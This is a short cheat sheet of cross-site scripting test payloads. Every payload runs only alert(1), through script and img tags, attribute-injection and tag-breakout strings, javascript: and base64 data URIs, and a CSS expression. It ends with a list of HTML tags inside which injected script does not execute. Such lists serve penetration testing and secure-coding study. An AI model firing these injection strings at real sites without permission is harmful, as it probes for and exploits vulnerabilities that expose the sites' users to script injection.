1. XSS payloads
<script>alert(1)</script>
'"><Script>alert(1)</Script>
<img/src=@ onerror=alert(1)/>
'"><img/src=@ onerror=alert(1)/>
'onmouseover=alert(1) x='
"onmouseover=alert(1) x="
`onmouseover=alert(1) x=`
javascript:alert(1)//
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
'";alert(1)//
</script><script>alert(1)//
)x:expression(alert(1))
alert(1)//
*/-->'"></iframe></script></style></title></textarea></xmp></noscript></noframes></plaintext><script>alert(1)</script>
2. Tags in which XSS cannot execute
<title></title>
<textarea></textarea>
<xmp></xmp>
<iframe></iframe>
<noscript></noscript>
<plaintext><plaintext>